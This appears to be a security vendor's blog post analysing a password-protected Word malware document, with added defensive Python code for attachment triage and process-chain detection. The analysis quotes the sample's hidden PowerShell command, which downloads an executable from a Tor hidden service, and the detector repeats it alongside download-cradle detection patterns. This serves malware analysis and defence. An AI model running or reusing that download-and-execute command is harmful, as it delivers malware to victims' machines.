Password Protected Word Document Connects to TOR Hidden Service
Password-protected documents are an effective way for malware to bypass anti-virus (AV) and other detection solutions: the AV typically cannot extract the required password from the text of the email that carries the malicious document. With VMRay Analyzer it has always been possible to interact with malware manually through browser-based VNC access, so by disabling automatic interaction a user could type the password in by hand while interacting with the sample.
In VMRay Analyzer v2.1, we’ve completely automated this process. Users can now provide the password at submission time, and it is entered automatically during the behavioral analysis (Figure 1). This removes the manual step and saves DFIR specialists and malware analysts valuable time.
We recently found a sample (thanks to Michael Gillespie) to demonstrate the enhanced automated analysis of password protected documents in VMRay Analyzer v2.1.
The Microsoft Word document was propagated via an email designed to trick the user into opening the malicious attachment through social engineering. According to Forrester, social engineering attacks like this one are the second most common type companies have faced over the past 12 months. A wary security analyst, upon getting a report of a potentially dangerous email like this, might upload the file to VirusTotal or another public analysis tool. However, since the document is password protected, its content is encrypted: neither a public analyzer nor the user’s own AV can analyze the document correctly without knowing the password.
The password is only mentioned in the email (“See attachment […]. Password is 5558.”), so if you only have access to the attachment, you won’t be able to analyze it properly. This is also why the technique is so good at staying undetected – simply changing the password produces a different encrypted file. VirusTotal scores it 0 / 56 (Figure 2); in other words, no AV engine detected it as malicious.
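The triage step described above, as an added example that is not part of the original post or of VMRay's own code: it checks whether an Office attachment is actually encrypted before anything is submitted for analysis, and pulls password candidates out of the accompanying email body. The encryption check is a byte-search approximation (Office 2007+ files are ZIP containers; once password-protected they become an OLE compound file carrying EncryptionInfo and EncryptedPackage streams) rather than a full compound-file directory parse, and legacy .doc/.xls files, whose encryption flag lives in the FIB, are only classified as legacy. The sample document bytes and the email body are constructed; the email wording mirrors the phrase quoted in the post.

```python
import re
from typing import Dict, List

# File-type signatures. Office 2007+ documents are ZIP containers; once
# password-protected they are wrapped in an OLE compound file that carries
# an EncryptionInfo and an EncryptedPackage stream.
ZIP_MAGIC = b"PK\x03\x04"
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
# Directory entry names inside a compound file are stored as UTF-16LE.
ENCRYPTION_INFO = "EncryptionInfo".encode("utf-16-le")
ENCRYPTED_PACKAGE = "EncryptedPackage".encode("utf-16-le")


def classify_office_attachment(data: bytes) -> str:
    """Coarse triage of an attachment before it is submitted for analysis."""
    if data.startswith(ZIP_MAGIC):
        return "ooxml-plain"          # scanners can unzip and inspect this
    if data.startswith(OLE_MAGIC):
        if ENCRYPTION_INFO in data and ENCRYPTED_PACKAGE in data:
            return "ooxml-encrypted"  # content unreadable without the password
        return "ole-legacy"           # .doc/.xls; encryption flag sits in the FIB, not checked here
    return "not-office"


# Phrasings commonly used to hand the recipient a password (assumed patterns).
PASSWORD_PATTERNS = [
    re.compile(r"\bpassword\s*(?:is|:)\s*([^\s.,;:\"'()]+)", re.IGNORECASE),
    re.compile(r"\bpw\s*:\s*([^\s.,;:\"'()]+)", re.IGNORECASE),
]


def extract_password_candidates(body: str) -> List[str]:
    """Return distinct password candidates in the order they appear in the email text."""
    candidates: List[str] = []
    for pattern in PASSWORD_PATTERNS:
        for match in pattern.finditer(body):
            if match.group(1) not in candidates:
                candidates.append(match.group(1))
    return candidates


def triage(attachment: bytes, email_body: str) -> Dict[str, object]:
    """Decide whether the attachment needs a password and where it might be found."""
    kind = classify_office_attachment(attachment)
    needs_password = kind == "ooxml-encrypted"
    passwords = extract_password_candidates(email_body) if needs_password else []
    return {"kind": kind, "needs_password": needs_password, "password_candidates": passwords}


# Constructed samples: a minimal byte blob with the OLE magic and the two
# stream names (not a real document), a plain OOXML stub, and an email body.
SAMPLE_ENCRYPTED_DOC = OLE_MAGIC + b"\x00" * 504 + ENCRYPTION_INFO + b"\x00" * 32 + ENCRYPTED_PACKAGE
SAMPLE_PLAIN_DOC = ZIP_MAGIC + b"\x00" * 32
SAMPLE_EMAIL = "Hi,\n\nSee attachment for the invoice. Password is 5558.\n\nRegards"

if __name__ == "__main__":
    print(triage(SAMPLE_ENCRYPTED_DOC, SAMPLE_EMAIL))
    print(triage(SAMPLE_PLAIN_DOC, SAMPLE_EMAIL))
```

The candidate list is what an analyst (or a submission script) would pass along with the attachment; a "needs_password" result with an empty candidate list is itself worth flagging, since the document can only be analyzed by someone who has the rest of the conversation.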
With VMRay Analyzer v2.1, we can take the password found in the body of the email and enter it before the analysis starts. Once the analysis is done, we can see that the malware author tries to trick the user into believing the “Can’t View” message comes from Microsoft Word, so that the user allows macros to run.
Our simulated user interaction is, of course, the best case scenario in every attacker’s eyes (and the worst case scenario for every sysadmin): VMRay Analyzer will do whatever is asked of it – like open the document and let macros run.
Let’s look at the processes spawned after the user enables macros to get a feel for what this malware does (Figure 4):
The macros start a batch file which then starts PowerShell to download and execute the actual payload:
powershell.exe -w hidden "(New-Object System.Net.WebClient).DownloadFile('hxxp://fbbkvm7ezghq4dx3.onion.link/msbus24.exe','C:\Users\HJRD1K~1\AppData\Local\Temp\msbus24.exe')"
Interestingly, this connects to a TOR hidden service (via a clearnet gateway), which is often seen in ransomware – of course, this behavior is a huge red flag, because there is basically no legitimate reason to hide an executable file behind TOR. This behavior is marked as malicious in the ‘Detected Threats’ section of the Analysis Report (Figure 5).
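The process chain above (Word → batch file → hidden PowerShell → download from an .onion gateway) is exactly the kind of sequence endpoint telemetry can flag. The following is an added example, not code from the post or from VMRay: it runs simple detection rules over constructed, Sysmon-style process-creation events. The PowerShell command line is the one quoted above; the Word and batch-file entries, the batch file name, and the unrelated backup job are assumptions made for the example. The .onion pattern accepts 16-character (v2) and 56-character (v3) addresses with or without a clearnet gateway suffix such as .onion.link, which goes slightly beyond the single host in the post.

```python
import re
from typing import Dict, List

# Constructed sample process-creation events (Sysmon-like shape). The
# PowerShell command line is quoted from the analysis; everything else,
# including run.bat and the backup job, is assumed for the example.
EVENTS: List[Dict] = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\HJRD1K~1\Downloads\attachment.doc"'},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\HJRD1K~1\AppData\Local\Temp\run.bat"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": ("powershell.exe -w hidden \"(New-Object System.Net.WebClient)."
                 "DownloadFile('hxxp://fbbkvm7ezghq4dx3.onion.link/msbus24.exe',"
                 "'C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\msbus24.exe')\"")},
    {"pid": 400, "ppid": 1,   "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line indicators. ONION_HOST matches v2 (16 chars) and v3 (56 chars)
# addresses, optionally followed by a gateway TLD such as .link or .to.
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
DOWNLOAD_CRADLE = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|Invoke-RestMethod|Start-BitsTransfer",
    re.IGNORECASE)
ONION_HOST = re.compile(r"\b[a-z2-7]{16}(?:[a-z2-7]{40})?\.onion(?:\.[a-z]{2,})?\b", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(pid: int, by_pid: Dict[int, Dict]) -> List[Dict]:
    """Walk the parent chain as far as the event set allows, guarding against pid reuse loops."""
    chain: List[Dict] = []
    seen = set()
    current = by_pid.get(pid)
    while current and current["ppid"] in by_pid and current["ppid"] not in seen:
        seen.add(current["ppid"])
        current = by_pid[current["ppid"]]
        chain.append(current)
    return chain


def analyse(events: List[Dict]) -> Dict[int, List[str]]:
    """Return, per pid, the indicators that fired; pids with no findings are omitted."""
    by_pid = {e["pid"]: e for e in events}
    findings: Dict[int, List[str]] = {}
    for event in events:
        tags: List[str] = []
        image = basename(event["image"])
        parents = ancestors(event["pid"], by_pid)
        if image in SHELLS and any(basename(p["image"]) in OFFICE_APPS for p in parents):
            tags.append("office-spawned-shell")
        if HIDDEN_WINDOW.search(event["cmdline"]):
            tags.append("hidden-window")
        if DOWNLOAD_CRADLE.search(event["cmdline"]):
            tags.append("download-cradle")
        if ONION_HOST.search(event["cmdline"]):
            tags.append("tor-hidden-service")
        if tags:
            findings[event["pid"]] = tags
    return findings


if __name__ == "__main__":
    for pid, tags in analyse(EVENTS).items():
        print(pid, ", ".join(tags))
```

Each indicator on its own is noisy (a hidden window or a download cradle appears in plenty of administrative scripts), which is why the parent-chain check matters: a shell descended from an Office process that also downloads from a Tor gateway is the combination the report flags, while the stand-alone backup job scores nothing.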
As demonstrated with this analysis, the added support for automated password protected document analysis in VMRay Analyzer v2.1 gives DFIR Specialists and CERTs another tool in their arsenal to facilitate and automate the fight against malware.
View the Full Password Protected Word Document Analysis